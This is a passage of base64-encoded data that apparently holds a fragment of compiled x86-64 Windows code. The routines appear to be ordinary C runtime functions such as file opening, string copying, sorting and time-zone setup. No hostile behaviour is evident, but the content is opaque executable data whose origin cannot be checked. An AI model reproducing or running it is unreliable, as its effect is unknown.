tEJEhIg/j/dMhIi9NMjQUadgQAg+I/SIvLSMH5BkjB4gZJiwzIgGQROP1Ii1wkMEiLdCQ4SIPEIF/DzMzM6W/+///MzMzpV////8zMzGaJTCQISIPsOEiLDWAwBABIg/n+dQzo8SQAAEiLDU4wBABIg/n/dQe4//8AAOslSINkJCAATI1MJEhBuAEAAABIjVQkQP8V1VsAAIXAdNkPt0QkQEiDxDjDzMzMiwW6fQQAw8xMi9FNhcB0PEUPtgpJ/8JBjUG/g/gZdwRBg8EgD7YKSP/CjUG/g/gZdwODwSBJg+gBdApFhcl0BUQ7yXTLRCvJQYvBwzPAw8xIg+woiwUSdQQAhcB1NkiFyXUa6Ehg///HABYAAADoeVz//7j///9/SIPEKMNIhdJ04UmB+P///3932EiDxCjpdP///0UzyUiDxCjpAAAAAEiLxEiJWAhIiWgQSIlwGFdIg+xASYvoSIv6SIvxTYXAD4SdAAAASYvRSI1I2OhSYP7/u////39IhfZ0CkiF/3QFSDvrdhLoxV///8cAFgAAAOj2W///61RIi0QkKEiDuDgBAAAAdRJMi8VIi9dIi87o8/7//4vY6zNIK/cPtgw+SI1UJCjoYl3//w+2D0iNVCQoi9joU13//0j/x0iD7QF0CIXbdAQ72HTSK9iAfCQ4AHQMSItEJCCDoKgDAAD9i8PrAjPASItcJFBIi2wkWEiLdCRgSIPEQF/DzMxIiVwkCFdIg+xQRYvQTIvBM8BIi5wkgAAAAEiF2w+VwIXAdRjoC1///7sWAAAAiRjoO1v//4vD6ZcAAACDC/8zwEiFyQ+VwIXAdNmLjCSIAAAAhcl0E0H3wX/+//+4AAAAAA+UwIXAdLuDZCRAAINkJEQAiUwkMESJTCQoRIlUJCBEi8pIi9NIjUwkQOizBQAAi/iJRCREg3wkQAB0LIXAdCFIYwtIi8FIwfgGSI0VVXMEAIPhP0jB4QZIiwTCgGQIOP6LC+gGmP//hf90A4ML/4vHSItcJGBIg8RQX8PMzEyL3EmJWxBJiWsYSYlzIFdBVkFXSIPsMExj8TPbTYvWQYgZQYPiP0iNDfpyBABJi8ZJweIGSMH4BkmL8UGL+EiL6kiLBMFC9kQQOIAPhBACAABBvwBABwBFhcd1IkmNSwiJXCRQ6KaT/v+FwA+FCwIAAItEJFBBI8d1Pw+67w6Lz0Ejz0G/AgAAAIH5AEAAAHQ+jYEAAP//uv+///+FwnQdjYEAAP7/hcJ0II2BAAD8/4XCdR3GBgHrGAv468G5AQMAAIvHI8E7wXUHRIg+6wKIHvfHAAAHAA+EhAEAAPZFAEAPhXoBAACLRQS6AAAAwCPCi8uL+z0AAABAdA89AAAAgHQzO8IPhVYBAACLRQiFwA+ESwEAAEE7x3YOg/gEdlyD+AUPhTgBAAC/AQAAAIXJD4TOAAAAQbgDAAAAiVwkUEiNVCRQQYvO6A4oAACFwH4Gg/8BD0T7g/j/dEVBO8d0V4P4Aw+FhwAAAIF8JFDvu78AdUTGBgHpiAAAAEWLxzPSQYvO6Lb7//9IhcB0ekUzwDPSQYvO6KT7//9Ig/j/dQzorVz//4sA6bYAAACLTQTB6R/pdv///w+3RCRQPf7/AAB1DeiKXP//xwAWAAAA69A9//4AAHUZRTPASYvXQYvO6Fn7//9Ig/j/dLVEiD7rE0UzwDPSQYvO6EH7//9Ig/j/dJ2F/3RZD74Oi/uJXCRQg+kBdBKD+QF1GsdEJFD//gAAQYv/6xHHRCRQ77u/AL8DAAAAhf9+KESLx0hjw0iNVCRQRCvDSAPQQYvO6OmL//+D+P8PhEb///8D2Dv7f9gzwEiLXCRYSItsJGBIi3QkaEiDxDBBX0FeX8NFM8lIiVwkIEUzwDPSM8noH1j//8zMzEiJXCQISIlsJBhWV0FWSIPsMEiL2cYBAIvKRYvxQYvoi/q+/////4PhA3RGg+kBdCCD+QF0FOiFW///xwAWAAAA6LZX//+LxustuAAAAMDrJvfCAAAHAA+VwfbCCA+VwCLI9tkbwCUAAACABQAAAEDrBbgAAACAiUMEuQAHAACLxyPBdF49AAEAAHRQPQACAAB0Qj0AAwAAdDQ9AAQAAHRCPQAFAAB0Hz0ABgAAdCY7wXQU6Ahb///HABYAAADoOVf//4vG6yG4AQAAAOsauAIAAADrE7gFAAAA6wy4BAAAAOsFuAMAAACJQwiD7RB0SoPtEHQ+g+0QdDKD7RB0JoPtQHQS6Lda///HABYAAADo6Fb//+smM/aBewQAAACAQA+UxusXvgMAAADrEL4CAAAA6wm+AQAAAOsCM/aDYxQAQLWAiXMMx0MQgAAAAECE/XQDgAsQvgCAAACF/nUf98cAQAcAdRRIjUwkWOgMkP7/hcB1fzl0JFh0A0AIK7kAAQAAhfl0F4sFOHgEAPfQQSPGQITFdQfHQxABAAAAQPbHQHQOD7prFBoPumsEEINLDAQPuucMcwMJSxAPuucNcwUPumsUGUD2xyB0Bw+6axQb6wtA9scQdAUPumsUHEiLbCRgSIvDSItcJFBIg8QwQV5fXsNIg2QkIABFM8lFM8Az0jPJ6BRW///MzMzMSIlcJBBIiXQkGFdIg+wgSGPZSI0Nb24EAEiL00iLw0jB+AaD4j9IweIGSIsEwYpMEDj2wUh1eITJeXRBuAIAAABIg8r/i8voVPj//0iL+EiD+P91Fug6Wf//gTiDAAAAdE3oTVn//4sA60Yz9kiNVCQwi8tmiXQkMESNRgHoOiQAAIXAdRdmg3wkMBp1D0iL14vL6HgdAACD+P90xUUzwDPSi8vo9/f//0iD+P90szPASItcJDhIi3QkQEiDxCBfw8zMzEiLxEiJWAhIiXgQTIlAGFVBVEFVQVZBV0iNaLlIgezAAAAARYvhTYvwRItNd0iL+kSLRW9Ii9lBi9RIjU3/6O38//8PEAAPEMhmD3PZCGZJD37PScHvIEyJfe8PEUWn8g8QQBDyDxFFz/IPEUW3QYP//3UX6FdY//+DIACDD//obFj//4sA6UcDAADoIJL//4kHg/j/dRjoNFj//4MgAIMP/+hJWP//xwAYAAAA69BIg2QkMABMjU3Xi02vQYvESItVp0WLx0iDZd8AxwMBAAAASItdt8HoB0jB6yD30Atdt4PgAYlcJCiJTCQgSYvOSMHqIMdF1xgAAACJRedIiV3H/xVVVQAARIt1q7kAAADASIlFv0yL6EiD+P8PhYIAAABBi8YjwTvBdUZB9sQBdEBIg2QkMABMjU3Xi02vQQ+69h9EiXWrRYvHSItVp4lcJCiJTCQgSItNX0jB6iD/FflUAABIiUW/TIvoSIP4/3UzSGMPTI09SmwEAEiLwYPhP0jB+AZIweEGSYsEx4BkCDj+/xXVVAAAi8jo4lb//+nc/v//SYvN/xXAUAAAhcB1Uf8VtlQAAIvIi9jowVb//0hjF0yNPftrBABIi8qD4j9IwfkGSMHiBkmLDM+AZBE4/kmLzf8Vk1QAAIXbD4WO/v//6PpW///HAA0AAADpfv7//4pdp4P4AnUFgMtA6wiD+AN1A4DLCIsPSYvV6KyP//9IYw9MjT2aawQASIvBgMsBSMH4BoPhP0jB4QaIXadJiwTHiFwIOEhjD0iLwYPhP0jB+AZIweEGSYsEx8ZECDkAQfbEAnQSiw/oz/z//0SL6IXAdTNMi22/DxBFp0yNTZ+LD/IPEE3PSI1V/0WLxA8pRf/GRZ8A8g8RTQ/o/Pf//4XAdBJEi+iLD+gSi///QYvF6RwBAABIYxeKRZ9Ii8qD4j9IwfkGSMHiBkmLDM+IRBE5SGMXSIvCg+I/SMH4BkjB4gZJiwzHQYvEwegQJAGAZBE9/ghEET32w0h1IEH2xAh0GkhjD0iLwYPhP0jB+AZIweEGSYsEx4BMCDgguQAAAMBBi8YjwTvBD4WhAAAAQfbEAQ+ElwAAAEmLzf8VOlMAAEiLTcdMjU3XSINkJDAAQQ+69h9Ei0XviUwkKItNr4lMJCBIi01fRIl1q0iLVadIweog/xXiUgAASIvQSIP4/3Uz/xXjUgAAi8jo8FT//0hjD0iLwYPhP0jB4QZIwfgGSYsEx4BkCDj+iw/oL5D//+nJ/P//SGMPSIvBg+E/SMH4BkjB4QZJiwTHSIlUCCgzwEyNnCTAAAAASYtbMEmLezhJi+NBX0FeQV1BXF3DzEiD7DhBi8HHRCQoAQAAAESLTCRgRYvQTIvaSIlMJCBEi8BBi9JJi8von/X//0iDxDjDzMxAU0iD7CD/BbRnBABIi9m5ABAAAOgnTf//M8lIiUMI6NxM//9Ig3sIAHQO8INLFEDHQyAAEAAA6xfwgUsUAAQAAEiNQxzHQyACAAAASIlDCEiLQwiDYxAASIkDSIPEIFvDzMzMSIPsKDPSM8noHyQAACUfAwAASIPEKMPMSIPsKOgXJAAAg+AfSIPEKMPMzMy6HwMIAOn2IwAAzMxAU0iD7CCL2ejnJgAAg+DCM8n2wx90LYrTRI1BAYDiEEEPRcj2wwh0A4PJBPbDBHQDg8kI9sMCdAODyRBBhNh0A4PJIAvISIPEIFvptCYAAEiLxEiJWAhIiWgQSIlwGEiJeCBBVEFWQVdIg+xQRTPkSYvoTIvySIv5QYvcSIXJdBBNhcB1BzPA6YABAABmRIkhSIXSdRnolVP//8cAFgAAAOjGT///SIPI/+leAQAASYvRSI1MJDDo6FP+/0iLRCQ4SIX/D4TfAAAATDmgOAEAAHUsSIXtD4QbAQAAQg+2BDNmiQdGOCQzD4QJAQAASP/DSIPHAkg73XLi6fgAAACLSAxIg8v/iWwkKESLy02LxkiJfCQgjVMK/xXGTgAASGPIhcAPhcoAAAD/FX1QAACD+Hp1X0SL/UmL9oXtdClB/89EOCZ0IQ+2DkiNVCQ46KHJ//+FwHQISP/GRDgmdDRI/8ZFhf/r1UiLRCQ4QSv2iWwkKESLzk2LxkiJfCQgugEAAACLSAz/FVhOAABIY8iFwHUR6JhS///HACoAAABmRIkn61NIi9nrTkiDy/9MOaA4AQAAdQtI/8NFOCQedffrNotIDESLy0SJZCQoTYvGugkAAABMiWQkIP8VBU4AAEhjyIXAdQ3oRVL//8cAKgAAAOsESI1Z/0Q4ZCRIdAxIi0wkMIOhqAMAAP1Ii8NMjVwkUEmLWyBJi2soSYtzMEmLezhJi+NBX0FeQVzDSIlcJAhIiXQkEEiJfCQYQVRBVkFXSIPsQEUz5E2L+UmL8EiL+kyL8UGL3EiF0nUHTYXAdCHrBU2FwHUW6MNR//+7FgAAAIkY6PNN///pwgAAAGZEiSJIhcl0A0yJIUiLlCSIAAAASI1MJCDoCFL+/0yLhCSAAAAATDvGTA9HxkmB+P///392DOh3Uf//uxYAAADrTkyNTCQoSYvXSIvP6ID9//9Ig/j/dRJIhf90BGZEiSfoTFH//4sY60VI/8BIhf90NUg7xnYqSIO8JIAAAAD/dBdmRIkn6CdR//+7IgAAAIkY6FdN///rFkiLxrtQAAAAZkSJZEf+TYX2dANJiQZEOGQkOHQMSItMJCCDoagDAAD9SIt0JGiLw0iLXCRgSIt8JHBIg8RAQV9BXkFcw0iNBQEgBADHBd9tBACAcAAASIkF6G0EADPAxwXQbQQAAQAAAMcFym0EAPDx///DzEiNBb1tBADDSI0FuW0EAMNIjQWpbQQAw0iLBbFtBADDSIPsKEiFyXUX6HZQ///HABYAAADop0z//7gWAAAA6wqLBX5tBACJATPASIPEKMPMSIPsKEiFyXUX6EZQ///HABYAAADod0z//7gWAAAA6wqLBVJtBACJATPASIPEKMPMSIPsKEiFyXUX6BZQ///HABYAAADoR0z//7gWAAAA6wqLBRptBACJATPASIPEKMPMSIlcJAhVVldBVUFWSIvsSIPsMEiL2ehN////RTP2SI1NOESJdThIi/BEiXVA6J7///+FwA+F/wEAAEiNTUDoLf///4XAD4XZAQAASIsN1mwEAEiFyXQmTIvBSIvDTCvDD7YQRg+2DABBK9F1CEj/wEWFyXXrhdIPhFcBAADopkf//0iDz/9Ii89I/8FEODQLdfdI/8Hozkf//zPJSIkFhWwEAOiAR///SIsNeWwEAEiFyQ+EHAEAAEj/x0Q4NDt190iNVwFMi8Po+0f//4XAD4U6AQAASIsORI1oA0WLzY1QQEyLw0GL/eh/CAAAhcAPhQUBAABEODN0CUj/w0iD7wF18oA7LUAPlMdAhP90A0j/w0iLy+jeSP//adAQDgAAiVU4igM8K3QGLDA8CXcFSP/D6++AOzp1TEj/w0iLy+i0SP//i1U4a8g8A9GJVTjrBzw5fwlI/8OKAzwwffOAOzp1Ikj/w0iLy+iKSP//i1U4A9CJVTjrBzw5fwlI/8OKAzwwffNAhP90BffaiVU4RDgzQYvGD5XAiUVAhcB0GkiLTghNi81Mi8O6QAAAAOi5BwAAhcB0CessSItGCESIMItdOOiY/f//iRiLXUDofv3//4kYSItcJGBIg8QwQV5BXV9eXcNFM8lMiXQkIEUzwDPSM8noV0r//8xFM8lMiXQkIEUzwDPSM8noQkr//8xFM8lMiXQkIEUzwDPSM8noLUr//8xFM8lMiXQkIEUzwDPSM8noGEr//8xFM8lMiXQkIEUzwDPSM8noA0r//8zMzEBVU1ZXSIvsSIPsSOgH/f//M/ZIjU0oiXUoSIvYiXUwiXU46Fj9//+FwA+FjwEAAEiNTTDo5/z//4XAD4VpAQAASI1NOOgG/f//hcAPhUMBAABIiw1/agQA6HpF//9IjQ2TagQASIk1bGoEAP8VnkcAAIP4/w+E8wAAAGsNdmoEADxEjUYBZjk1sWoEAIsVuWoEAESJBU5qBACJTSh0CGvCPAPIiU0oZjk15GoEAHQYiwXqagQAhcB0DivCRIlFMGvAPIlFOOsGiXUwiXU46MnH//9IiwtMjQUfagQAi/hBg8n/SI1FQDPSSIlEJDhIiXQkMMdEJCg/AAAASIlMJCCLz/8VAEkAAIXAdA45dUB1CUiLA0CIcD/rBkiLA0CIMEiNRUBBg8n/SIlEJDhMjQUcagQASItDCDPSSIl0JDCLz8dEJCg/AAAASIlEJCD/FbRIAACFwHQPOXVAdQpIi0MIQIhwP+sHSItDCECIMItdKOia+///iRiLXTDogPv//4kYi1046H77//+JGEiDxEhfXltdw0UzyUiJdCQgRTPAM9IzyehXSP//zEUzyUiJdCQgRTPAM9IzyehCSP//zEUzyUiJdCQgRTPAM9IzyegtSP//zEiJXCQISIl0JBBXSIHsQAEAAEiLBXMRBABIM8RIiYQkMAEAAIPI/0yNDSqzAAAz9okF7hoEAEG4AAEAAIk10mgEAEiNVCQwiQXHGgQASI1MJCDoFSAAAIXAdQdIjXwkMOtOg/gidAVIi/7rREiLTCQg6M5D//9Ii/hIhcB1CTPJ6H9D///r4EyLRCQgTI0NxbIAAEiL0EiNTCQo6MwfAACFwHQFSIvP69czyehUQ///SI1EJDBIi99IO/hID0TeSIX/dA9AODd0CkiLz+gL+///6wXoVP3//0iLy+gkQ///SIuMJDABAABIM8zo1CwAAEyNnCRAAQAASYtbEEmLcxhJi+Nfw8zMzEiD7CiLBb5oBACFwHUpjUgG6Gpz//+QiwWraAQAhcB1DOjS/v//8P8Fm2gEALkGAAAA6J1z//9Ig8Qow0g70Q+GwgAAAEiJbCQgV0FWQVdIg+wgSIlcJEBNi/FIiXQkSEmL6EyJZCRQSIv6To0kAUyL+WZmDx+EAAAAAABJi99Ji/RMO+d3JQ8fRAAASYvO/xWPTAAASIvTSIvOQf/WhcBID0/eSAP1SDv3duBMi8VIi8dIO990K0iF7XQmSCvfDx9AAGYPH4QAAAAAAA+2CA+2FAOIDAOIEEiNQAFJg+gBdepIK/1JO/93kkyLZCRQSIt0JEhIi1wkQEiLbCRYSIPEIEFfQV5fw8zMzMxAVUFUQVZIgexABAAASIsFZA8EAEgzxEiJhCQABAAATYvxSYvoTIvhSIXJdRpIhdJ0FeiFSf//xwAWAAAA6LZF///p0AIAAE2FwHTmTYXJdOFIg/oCD4K8AgAASImcJDgEAABIibQkMAQAAEiJvCQoBAAATImsJCAEAABMibwkGAQAAEyNev9MD6/9TAP5RTPtM9JJi8dJK8RI9/VIjXABSIP+CHcqTYvOTIvFSYvXSYvM6Hn+//9Jg+0BD4guAgAATotk7CBOi7zsEAIAAOvBSNHuSYvOSA+v9UkD9P8VNUsAAEiL1kmLzEH/1oXAfilMi8VIi9ZMO+Z0Hk2LzEwrzg+2AkEPtgwRQYgEEYgKSI1SAUmD6AF16EmLzv8V9koAAEmL10mLzEH/1oXAfilMi8VJi9dNO+d0Hk2LzE0rzw+2AkEPtgwRQYgEEYgKSI1SAUmD6AF16EmLzv8Vt0oAAEmL10iLzkH/1oXAfipMi8VJi9dJO/d0H0yLzk0rz5APtgJBD7YMEUGIBBGICkiNUgFJg+gBdehJi9xJi/9mkEg783YjSAPdSDvecxtJi87/FWJKAABIi9ZIi8tB/9aFwH7iSDvzdx5IA91JO993FkmLzv8VP0oAAEiL1kiLy0H/1oXAfuJIK/1IO/52FkmLzv8VIUoAAEiL1kiLz0H/1oXAf+JIO/tyQEyLxUiL10g733QkTIvLTCvPZg8fRAAAD7YCQQ+2DBFBiAQRiApIjVIBSYPoAXXoSDv3D4Vf////SIvz6Vf///9IA/1IO/dzI0gr/Ug7/nYbSYvO/xW2SQAASIvWSIvPQf/WhcB04kg793IeSCv9STv8dhZJi87/FZNJAABIi9ZIi89B/9aFwHTiSYvPSIvHSCvLSSvESDvBfCZMO+dzEE6JZOwgSom87BACAABJ/8VJO98Pg/b9//9Mi+PpyP3//0k733MQSolc7CBOibzsEAIAAEn/xUw75w+D0P3//0yL/+mi/f//TIusJCAEAABIi7wkKAQAAEiLtCQwBAAASIucJDgEAABMi7wkGAQAAEiLjCQABAAASDPM6IkoAABIgcRABAAAQV5BXF3DSIlcJAhXSIPsIEUz0kyL2k2FyXUsSIXJdSxIhdJ0FOhkRv//uxYAAACJGOiUQv//RIvTQYvCSItcJDBIg8QgX8NIhcl02UiF0nTUTYXJdQVEiBHr3k2FwHUFRIgR68BMK8FIi9FJi9tJi/lJg/n/dRVBigQQiAJI/8KEwHQpSIPrAXXt6yFBigQQiAJI/8KEwHQMSIPrAXQGSIPvAXXnSIX/dQNEiBJIhdt1h0mD+f91DkaIVBn/RI1TUOlz////RIgR6MBF//+7IgAAAOlX////zMxIg+xYSIsFZQsEAEgzxEiJRCRAM8BMi8pIg/ggTIvBc3fGRAQgAEj/wEiD+CB88IoC6x8PttBIweoDD7bAg+AHD7ZMFCAPq8FJ/8GITBQgQYoBhMB13esfQQ+2wboBAAAAQQ+2yYPhB0jB6APT4oRUBCB1H0n/wEWKCEWEyXXZM8BIi0wkQEgzzOgaJwAASIPEWMNJi8Dr6eg3KAAAzMzMRTPA6QAAAABIiVwkCFdIg+xASIvaSIv5SIXJdRTo8kT//8cAFgAAAOgjQf//M8DrYkiF0nTnSDvKc/JJi9BIjUwkIOhARf7/SItMJDCDeQgAdQVI/8vrJUiNU/9I/8pIO/p3Cg+2AvZECBkEde5Ii8tIK8qD4QFIK9lI/8uAfCQ4AHQMSItMJCCDoagDAAD9SIvDSItcJFBIg8RAX8PMzEiD7Cjof6z//zPJhMAPlMGLwUiDxCjDzIsFElkEAIXAD4Tu4///RTPJ6QIAAADMzEiLxEiJWAhIiWgQSIlwGFdIg+xgSIvySIvpSYvRSI1I2EmL+OiPRP7/SIX/dQcz2+mgAAAASIXtdAVIhfZ1F+gARP//xwAWAAAA6DFA//+7////f+t/u////39IO/t2EujfQ///xwAWAAAA6BBA///rY0iLRCRISIuQMAEAAEiF0nUXTI1MJEhMi8dIi9ZIi83onuP//4vY6zuLQBRIjUwkSIlEJDhMi82JfCQwQbgBEAAASIl0JCiJfCQg6LsbAACFwHUN6HpD///HABYAAADrA41Y/oB8JFgAdAxIi0QkQIOgqAMAAP1MjVwkYIvDSYtbEEmLaxhJi3MgSYvjX8MzwDgBdA5IO8J0CUj/wIA8CAB18sPMzMxAU0iD7CBIi9notu7//4kD6Mfu//+JQwQzwEiDxCBbw0BTSIPsIINkJDAASIvZiwmDZCQ0AOi27v//i0sE6Lru//9IjUwkMOi0////i0QkMDkDdQ2LRCQ0OUMEdQQzwOsFuAEAAABIg8QgW8NAU0iD7CCDZCQ4AEiL2YNkJDwASI1MJDjod////4XAdAe4AQAAAOsiSItEJDhIjUwkOINMJDgfSIkD6HX///+FwHXe6OgRAAAzwEiDxCBbw0UzwPIPEUQkCEiLVCQISLn/////////f0iLwkgjwUi5AAAAAAAAQENIO9BBD5XASDvBchdIuQAAAAAAAPB/SDvBdn5Ii8rpNR0AAEi5AAAAAAAA8D9IO8FzK0iFwHRiTYXAdBdIuAAAAAAAAACASIlEJAjyDxBEJAjrRvIPEAXJkgMA6zxIi8K5MwAAAEjB6DQqyLgBAAAASNPgSP/ISPfQSCPCSIlEJAjyDxBEJAhNhcB1DUg7wnQI8g9YBYuSAwDDzMxIg+xYZg9/dCQggz2nXwQAAA+F6QIAAGYPKNhmDyjgZg9z0zRmSA9+wGYP+x1PqQAAZg8o6GYPVC0TqQAAZg8vLQupAAAPhIUCAABmDyjQ8w/m82YPV+1mDy/FD4YvAgAAZg/bFTepAADyD1wlv6kAAGYPLzVHqgAAD4TYAQAAZg9UJZmqAABMi8hIIwUfqQAATCMNKKkAAEnR4UkDwWZID27IZg8vJTWqAAAPgt8AAABIwegsZg/rFYOpAABmD+sNe6kAAEyNDQS7AADyD1zK8kEPWQzBZg8o0WYPKMFMjQ3LqgAA8g8QHcOpAADyDxANi6kAAPIPWdryD1nK8g9ZwmYPKODyD1gdk6kAAPIPWA1bqQAA8g9Z4PIPWdryD1nI8g9YHWepAADyD1jK8g9Z3PIPWMvyDxAt06gAAPIPWQ2LqAAA8g9Z7vIPXOnyQQ8QBMFIjRVmsgAA8g8QFMLyDxAlmagAAPIPWebyD1jE8g9Y1fIPWMJmD290JCBIg8RYw2ZmZmZmZg8fhAAAAAAA8g8QFYioAADyD1wFkKgAAPIPWNBmDyjI8g9eyvIPECWMqQAA8g8QLaSpAABmDyjw8g9Z8fIPWMlmDyjR8g9Z0fIPWeLyD1nq8g9YJVCpAADyD1gtaKkAAPIPWdHyD1ni8g9Z0vIPWdHyD1nq8g8QFeynAADyD1jl8g9c5vIPEDXMpwAAZg8o2GYP2x1QqQAA8g9cw/IPWOBmDyjDZg8ozPIPWeLyD1nC8g9ZzvIPWd7yD1jE8g9YwfIPWMNmD290JCBIg8RYw2YP6xXRpwAA8g9cFcmnAADyDxDqZg/bFS2nAABmSA9+0GYPc9U0Zg/6LUuoAADzD+b16fH9//9mkHUe8g8QDaamAABEiwXfqAAA6KoaAADrSA8fhAAAAAAA8g8QDaimAABEiwXFqAAA6IwaAADrKmZmDx+EAAAAAABIOwV5pgAAdBdIOwVgpgAAdM5ICwWHpgAAZkgPbsBmkGYPb3QkIEiDxFjDDx9EAABIM8DF4XPQNMTh+X7AxeH7HWumAADF+ubzxfnbLS+mAADF+S8tJ6YAAA+EQQIAAMXR7+3F+S/FD4bjAQAAxfnbFVumAADF+1wl46YAAMX5LzVrpwAAD4SOAQAAxfnbDU2mAADF+dsdVaYAAMXhc/MBxeHUycTh+X7IxdnbJZ+nAADF+S8lV6cAAA+CsQAAAEjB6CzF6esVpaYAAMXx6w2dpgAATI0NJrgAAMXzXMrEwXNZDMFMjQ31pwAAxfNZwcX7EB3ppgAAxfsQLbGmAADE4vGpHcimAADE4vGpLV+mAADyDxDgxOLxqR2ipgAAxftZ4MTi0bnIxOLhuczF81kNzKUAAMX7EC0EpgAAxOLJq+nyQQ8QBMFIjRWirwAA8g8QFMLF61jVxOLJuQXQpQAAxftYwsX5b3QkIEiDxFjDkMX7EBXYpQAAxftcBeClAADF61jQxfteysX7ECXgpgAAxfsQLfimAADF+1nxxfNYycXzWdHE4umpJbOmAADE4umpLcqmAADF61nRxdtZ4sXrWdLF61nRxdNZ6sXbWOXF21zmxfnbHcamAADF+1zDxdtY4MXbWQ0mpQAAxdtZJS6lAADF41kFJqUAAMXjWR0OpQAAxftYxMX7WMHF+1jDxflvdCQgSIPEWMPF6esVP6UAAMXrXBU3pQAAxdFz0jTF6dsVmqQAAMX5KMLF0fotvqUAAMX65vXpQP7//w8fRAAAdS7F+xANFqQAAESLBU+mAADoGhgAAMX5b3QkIEiDxFjDZmZmZmZmZg8fhAAAAAAAxfsQDQikAABEiwUlpgAA6OwXAADF+W90JCBIg8RYw5BIOwXZowAAdCdIOwXAowAAdM5ICwXnowAAZkgPbshEiwXzpQAA6LYXAADrBA8fQADF+W90JCBIg8RYw8xIg+xISINkJDAASI0N06UAAINkJCgAQbgDAAAARTPJRIlEJCC6AAAAQP8VPTkAAEiJBS4LBABIg8RIw8xIg+woSIsNHQsEAEiNQQJIg/gBdgb/FTU5AABIg8Qow0iJXCQISIlsJBBIiXQkGFdBVkFXSIPsIEiL2r0BAAAARIvFM9KL8ehk2v//TIvwSIP4/3UM6Go7//+LAOmmAAAAM9KLzkSNQgLoQtr//0iD+P904UiL+0gr+EiF/w+OxQAAAEG/ABAAAEiL1UGLz+i8NP//SIvYSIXAdRDoIzv//8cADAAAAOmJAAAAugCAAACLzuj4cP7/i+hEi8dJO/9Ii9OLzkUPTcfoymv//4P4/3RNSJhIK/hIhf9/3YvVi87oynD+/0iLy+gKM///RTPASYvWi87otdn//0iD+P8PhFD///8zwEiLXCRASItsJEhIi3QkUEiDxCBBX0FeX8Pofzr//4M4BXUL6JU6///HAA0AAADoijr//0iLy4s46LQy//+Lx+u/eaRFM8BIi9OLzuhZ2f//SIP4/w+E9P7//4vO6Ah2//9Ii8j/FUc2AACFwA+Fdf///+hGOv//xwANAAAA6Bs6//9Ii9j/Fa43AACJA+m8/v//zMzMQFNVVldBVEFVQVZBV0iD7DhMY+lMjRXhTgQASYv9TYv9ScH/BoPnP0jB5wZMi/JBuQoAAABLiwT6SItMOChIiYwkmAAAAE2FwHQNZkQ5CnUHgEw4OATrBYBkODj7To0kQkiL8kiL2kk71A+DogEAAEiNagK6DQAAAA+3BmaD+BoPhG4BAABmO8J0FGaJA0iDwwJIg8YCSIPFAumaAAAASTvscx5mRDlNAHUSSIPGBGZEiQtIg8UESIPDAut8ZokT68xIg2QkIABMjYwkkAAAAEG4AgAAAEiNlCSAAAAASIPGAkiDxQL/FZA2AACFwA+E5AAAAIO8JJAAAAAAD4TWAAAATI0V800EAEG5CgAAAEuLBPr2RDg4SHRlD7eEJIAAAABmQTvBdR9mRIkLug0AAABIi4wkmAAAAEk79A+CN////+nLAAAAuQ0AAABmiYQkiAAAAGaJCzPSS4sM+oqEFIgAAABIA8+IRBE6SP/CSIP6AnzlS4sE+kSITDg8661mRDmMJIAAAAB1D0k73nUKZkSJC0iDwwLrk0jHwv7///9Bi81EjUID6GjX//9BuQoAAABMjRVDTQQAZkQ5jCSAAAAAD4Rk////QY1RA2aJE0iDwwLpWf///7oNAAAATI0VGE0EAGaJE0iDwwJEjUr96T3///9Liwz6ikQ5OKhAdQgMAohEOTjrCg+3DmaJC0iDwwJJK95I0ftIjQQbSIPEOEFfQV5BXUFcX15dW8PMzMxMiUwkIIlMJAhTVVZXQVRBVUFWQVdIg+w4SYvpTI0VeZ33/0xjyUyL8kmL+U2L+UnB/waD5z9IwecGS4uE+jCvDABMi2w4KE2FwHQMgDoKdQeATDg4BOsFgGQ4OPtOjSQCSIvySIvaSTvUD4M1AQAASI1qAYoGPBoPhPgAAAA8DXQQiANI/8NI/8ZI/8Xp2QAAAEk77HMbgH0ACnUQSIPGAkiDxQLGAwrpuwAAAMYDDevSSINkJCAATI2MJJAAAABBuAEAAABIjZQkiAAAAEmLzUj/xkj/xf8VbzQAAIXAdH2DvCSQAAAAAHRzTI0Vqpz3/0uLhPowrwwA9kQ4OEh0IYqMJIgAAACA+Qp1BIgL61rGAw1Li4T6MK8MAIhMODrrSYC8JIgAAAAKdQlJO94PhHD///+LjCSAAAAAQbgBAAAASIPK/+iZ1f//gLwkiAAAAApMjRVCnPf/dA/rB0yNFTec9//GAw1I/8NJO/QPggD////rH0uLjPowrwwAikQ5OKhAdQgMAohEOTjrB4oGiANI/8NEi4wkgAAAAEiLrCSYAAAAQSvedQczwOk7AQAAS4uM+jCvDACAfDk5AHUHi8PpJQEAAEhjw0mNXv9IA9j2A4B1CEj/w+mqAAAAugEAAADrD4P6BHcYSTvechNI/8v/wg+2A0KAvBDQaQwAAHTjRA+2A0MPvoQQ0GkMAIXAdRPo4DX//8cAKgAAAIPI/+nGAAAA/8A7wnUHi8JIA9jrVfZEOThIdDtI/8NEiEQ5OoP6AnIRigNI/8NLi4z6MK8MAIhEOTuD+gN1EYoDSP/DS4uM+jCvDACIRDk8i8JIK9jrE/faQbgBAAAASGPSQYvJ6FzU//+LhCSgAAAAQSveiUQkKESLy02LxkiJbCQgM9K56f0AAP8V/jAAAIvQhcB1Ev8VujIAAIvI6Mc0///pWP///0iNDc+a9/9Ki4z5MK8MAIBkOT39O8MPlcAkAQLACEQ5PYvCSAPASIPEOEFfQV5BXUFcX15dW8PMzMxIiVwkGEiJVCQQVVZXQVRBVUFWQVdIg+xgTGPpTIvKRYvgQYP9/nUZ6Ks0//8z9okw6MI0///HAAkAAADpCQQAADP2hckPiOgDAABEOy16TQQAD4PbAwAASYvtRI1GAYPlP0yJRCRISYvVSMHlBkjB+gZMjR1TSQQASIlUJEBJiwTTRIREKDgPhKYDAABBgfz///9/dhfoPTT//4kw6FY0///HABYAAADpmAMAAEWF5A+EeQMAAPZEKDgCD4VuAwAATYXJdNBIi0woKEiL3kQPvlQoOb8EAAAASIlMJDhBi8pEiJQkoAAAAEEryHQaQSvIdQpBi8T30EGEwHQVRYv0TYv56aAAAABBi8T30EGEwHUc6MEz//+JMOjaM///xwAWAAAA6Asw///phgEAAEWL9EHR7kQ790QPQvdBi87oKSz//zPJSIvY6N8r//8zyejYK///TIv7SIXbdRvolzP//8cADAAAAOhsM///xwAIAAAA6T0BAAAz0kGLzUSNQgHoX9L//0iLVCRATI0dO0gEAESKlCSgAAAAQbgBAAAASYsM00iJRCkwSYsE04v+TIl8JFBBuQoAAAD2RCg4SHR9ikwoOkE6yXR0RYX2dG9BiA9B/85JiwTTTQP4QYv4RIhMKDpFhNJ0VUmLBNOKTCg7QTrJdEhFhfZ0Q0GID0GNefhJiwTTTQP4Qf/ORIhMKDtFOtB1KE